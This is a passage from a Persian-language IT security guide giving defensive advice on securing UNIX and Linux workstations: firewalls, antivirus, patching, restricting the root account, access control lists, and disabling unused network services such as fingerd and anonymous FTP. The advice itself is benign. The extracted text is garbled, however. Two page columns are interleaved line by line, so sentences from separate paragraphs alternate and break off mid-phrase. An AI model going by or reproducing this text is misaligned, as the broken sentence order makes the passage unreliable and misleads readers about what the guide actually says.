‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠٢‬‬

‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻗﺪﺭﺕ ﻭ ﺍﻧﻌﻄﺎﻑ ﭘﺬﻳﺮﻱ ‪ UNIX‬ﺑﺎ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ ﺑـﻮﺩﻥ‬ ‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬


‫)ﺍﺯ ﺩﻳﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺎﺯﻩﻛﺎﺭ( ﻫﻤﺮﺍﻩ ﻧﺸﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ‬
‫ﺳﻴــﺴﺘﻤﻬﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻏﻴــﺮ ﻣﺘﺨــﺼﺺ ‪ UNIX‬ﺑﻌﻨــﻮﺍﻥ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻣﻄﻤـﺌﻦ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ ،‬ﻭﺟـﻮﺩ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻗـﻮﻱ ﺑـﺮﺍﻱ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩﺍﺳـﺖ ﻛـﻪ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻻﺯﻡ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﻫﺮ ﺣـﺎﻝ ﭘﺎﻳـﻪ ﻭ ﺍﺳـﺎﺱ‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔـﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ ﺷـﻤﺎ ﻫـﺸﺪﺍﺭ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﭘﻴﭽﻴﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑـﻪ ﻭ‬
‫ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺗﺎﺯﻩﻛﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﻭﺭﻭﺩ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﮔﺬﺍﺭﺩ‪ .‬ﺍﮔﺮﭼـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪UNIX‬‬ ‫ﺿﺪﻭﻳﺮﻭﺱ‬
‫ﻧﺴﺒﺘﹰﺎ ﻋﺎﺭﻱ ﺍﺯ ﻭﻳﺮﻭﺱ ﻫﺴﺘﻨﺪ ﻭﻟﻲ ﭘـﺬﻳﺮﺍﻱ ﺁﺧـﺮﻳﻦ ﻛﺮﻣﻬـﺎ ﻭ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ‬
‫ﺗﺮﻭﺍﻫﺎﻱ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻟـﺬﺍ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻫﻨـﻮﺯ ﺟـﺰﺀ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ‬
‫ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺁﻧﻬﺎ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ‬
‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬ ‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ‬
‫ﺗﻤﺎﻣﻲ ﻋﻨﺎﻭﻳﻨﻲ ﻛﻪ ﺩﺭ ‪ ۷‬ﻓﺼﻞ ﮔﺬﺷـﺘﻪ ﺫﻛـﺮ ﺷـﺪﻧﺪ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Linux ،UNIX‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﺁﻧﻬـﺎ ﻧﻴـﺰ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬
‫ﺻﺎﺩﻕ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑﺨﻮﺍﻫﻴـﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﻭﺍﺟـﺪ‬
‫ﺍﻣﻨﻴﺖ ﻧﺴﺒﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺭﻭﻱ‬ ‫‪ ،Linux ،UNIX‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ‬
‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗـﻚﻛـﺎﺭﺑﺮﻩ ﻣﺘﻤﺮﻛـﺰ ﺍﺳـﺖ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ‬
‫ﻣﺴﺌﻮﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺑﺨﺶ ﭘﻨﺠﻢ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬ ‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺍﺯ ﺍﺑﺘــﺪﺍﻱ ﭘﻴــﺪﺍﻳﺶ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﻋﻠــﻮﻡ‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ‪UNIX‬‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ‪ ١٢٤‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫)ﻫﻢ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ ﻭ ﻫﻢ ﺑـﺮﺍﻱ ﻣﺤﺎﺳـﺒﺎﺕ ﭼﻨـﺪﻛﺎﺭﺑﺮﻱ( ﺑﻜـﺎﺭ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻴﻪ ‪،UNIX‬‬
‫ﻣﻲﺭﻓﺘﻨﺪ ﻭ ﻃﻲ ﺩﻫـﺔ ﮔﺬﺷـﺘﻪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐ ﺷﺪﺓ‬
‫‪ - Macintosh‬ﻛﻪ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﺴﺘﮕﺎﻩﻫـﺎﻱ ﻛـﺎﺭﻱ‬
‫ﺍﻣﻨﻴﺘﻲ‪ ١٢٦‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﺴﻴﺎﺭ‬
‫ﺗﻚﻛﺎﺭﺑﺮﻩ‪ ١٢٥‬ﺑﻮﺩﻧﺪ ‪ -‬ﺗﺎ ﺣﺪﻭﺩﻱ ﭘﻴﺸﻲ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺑـﺎ ﻣﺤﺒﻮﺑﻴـﺖ‬
‫ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺁﻥ ﻧﮕﺎﺭﺵ ﺍﺯ ‪ Unix‬ﻛـﻪ‬
‫ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ‪ Linux‬ﺍﻳﻦ ﭘﺪﻳﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ؛ ﺯﻳـﺮﺍ ﺍﺯ ﻳـﻚ‬
‫ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻣﻄﺎﻟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻧـﺎﻡ ﭼﻨـﺪﻳﻦ‬
‫ﺳﻮ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺟﺎﻟـﺐ ﻭ ﺟـﺬﺍﺏ ﺑـﻮﺩ ﻭ ﺍﺯ ﺳـﻮﻱ ﺩﻳﮕـﺮ‬
‫ﻛﺘﺎﺏ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ‪ ،‬ﻭ ﮔﺮﻭﻩ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑــﺮﺧﻼﻑ ‪ Windows‬ﻣــﺘﻦ ﺑﺮﻧﺎﻣــﺔ ﺁﻥ ﺑــﺼﻮﺭﺕ ﺭﺍﻳﮕــﺎﻥ ﺩﺭ‬
‫ﻣﻔﻴﺪ ﻛﻪ ﺑﻪ ﺍﻣﻨﻴـﺖ ‪ Unix‬ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺭﻧـﺪ ﺩﺭ ﺑﺨـﺶ‬
‫ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﻮﺳﻌﻪ ﺑﻴﺶ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺭ ﻛﺎﻧﻮﻥ ﺗﻮﺟﻪﻫﺎ ﻭﺍﻗـﻊ‬
‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬ ‫ﺷﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺰﻳﻨﺔ ﺗﻬﻴﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻣﺘﻮﺳﻂ ﺳﻄﺢ ﺩﺭﺁﻣﺪ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺎﺷـﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻤﹰﺎ ﺑﺎﻳـﺪ ﺑـﻪﺭﻭﺯ ﮔـﺮﺩﺩﻭ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎﻱ‬
‫ﺍﺯ ﻧﻘﺎﻁ ﻗﻮﺕ ‪ UNIX‬ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻧﻌﻄـﺎﻑﭘـﺬﻳﺮﻱ ﺁﻥ ﻭ ﻧﻴـﺰ‬
‫ﺍﻣﻨﻴﺘﻲ ﺳﺮﻳﻌﹰﺎ ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﺷﻮﻧﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻨﻜﻪ ﺑﺴﺘﺔ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷـﺮﻛﺘﻬﺎ ﻃـﻲ ﺍﻳـﻦ ﺳـﺎﻟﻬﺎ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳـﺪ ﺗﻬﻴـﻪ ﻛـﺮﺩ ﻭ ﭼﮕﻮﻧـﻪ ﺁﻧـﺮﺍ‬
‫ﺑﺮﺍﻱ ﺁﻥ ﺗﻮﻟﻴﺪ ﺷﺪﻩﺍﻧﺪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪.‬‬

‫‪124 Workstation‬‬
‫‪126 Pre-Installed Security Mechanisms‬‬ ‫‪125 Single-User‬‬
‫‪١٠٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬ ‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬


‫ﺑـــﺴﻴﺎﺭﻱ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ‪ UNIX‬ﺩﺍﺭﺍﻱ ﺧـــﺪﻣﺎﺕ‬ ‫ﻛﺎﺭﺑﺮ ﺭﻳﺸﻪ‪ (uid 0) ١٢٧‬ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺩﺍﺭﺩ‬
‫ﺳﻴــﺴﺘﻤﻲ ﮔــﺴﺘﺮﺩﻩﺍﻱ ﻫــﺴﺘﻨﺪ‪ ،‬ﻣﺜــﻞ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ‬ ‫ﻻ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺍﺑﻌﺎﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺑـﺮ‬
‫ﻭ ﻣﻌﻤﻮ ﹰ‬
‫‪ ،FTP‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﭘــﺴﺖ‬ ‫ﻫﻤــﻴﻦ ﺍﺳــﺎﺱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﻭ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺑـﺼﻮﺭﺕ‬ ‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻳﻦ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ‬ ‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ ‪ UNIX‬ﺑـﺸﻤﺎﺭ‬
‫ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤـﻲ ﮔﻴﺮﻧـﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ‪.‬‬ ‫ﻣــﻲﺭﻭﺩ‪ .‬ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺩﺭ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺑﻌﻀﻲ ﻣﺮﺩﻡ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﭼـﻮﻥ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﻭﺟـﻮﺩ‬ ‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﺧـﻮﺩﺩﺍﺭﻱ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤـﻮﺩ ‪ -‬ﺣﺘـﻲ ﺍﮔـﺮ ﺗﺨـﺼﺺ‬ ‫ﺑﻴﺸﺘﺮ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ‬ ‫ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ‬
‫ﺑﺰﺭﮔﻲ ﺍﺳﺖ ﻭ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﺒﺎﻳﺪ ﺑﺪﻭﻥ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨـﺪﻩ‬ ‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺍﺯ ﺩﺳـﺘﻮﺭ ‪superuser‬‬
‫ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫)‪ su‬ﻳﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ‪ (sudo‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺣـﺴﺎﺏ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﺗﺒﺪﻳﻞ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ ‪inetd‬‬
‫ﻳــﺎ ‪ xinetd‬ﺷــﺮﻭﻉ ﺑــﻪ ﻓﻌﺎﻟﻴــﺖ ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﻓﺎﻳﻠﻬــﺎﻱ‬ ‫ﺍﮔﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻳﺪ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻪ ﺗﻮﺳﻂ ﺍﻳﻦ ‪ daemon‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ‬ ‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‪ ١٢٨‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻻﺯﻡ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﺪﺍﺭﻳﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺧﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺩﻳﮕـﺮ ﻛـﻪ‬ ‫ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎ ﻳﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻫﻨﮕﺎﻡ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﻴﺴﺘﻢ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣـﻲﻛﻨﻨـﺪ ﺩﺭ‬ ‫ﻏﻴــﺮ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ‬
‫ﻓﺎﻳﻠﻬــﺎﻳﻲ ﺩﺭ ﻣــﺴﻴﺮ ‪ /etc/init.d‬ﻳــﺎ ‪ /etc/rc*.d‬ﻭ ﻳــﺎ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪ /etc/rc‬ﻭ ‪ /etc/rc.local‬ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺑـﻪ ﺧـﺪﻣﺎﺗﻲ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ‬ ‫ﻫﻴﭽﮕﺎﻩ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎﺯ ﻭ‬
‫ﺩﻳﮕﺮﺍﻥ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ ‪ -‬ﻣﺜـﻞ ‪ - fingerd‬ﺗﻮﺟـﻪ ﻭﻳـﮋﻩ‬ ‫ﻻ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛـﻪ ﺑـﺎ‬ ‫ﻳﺎ ﻛﺎﻣﭙﺎﻳﻞ ﻧﻜﻨﻴﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬ ‫‪ chroot‬ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﻳﺪ ﻛﺎﻣﭙﺎﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺍﺯ ﺷـﻤﺎ‬
‫ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺗﺮﻭﺍﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‪ ١٢٩‬ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﻧﻤـﻮﺩﻩ ﺍﻳـﺪ‬
‫ﺣﺘﻤــﹰﺎ ﺁﻧـــﺮﺍ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻧﻤﺎﻳﻴـــﺪ‪ .‬ﻫﺮﮔـــﺰ ﻓﺎﻳـــﻞ‬ ‫ﻧﺼﺐ ﺩﻳﺴﻜﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
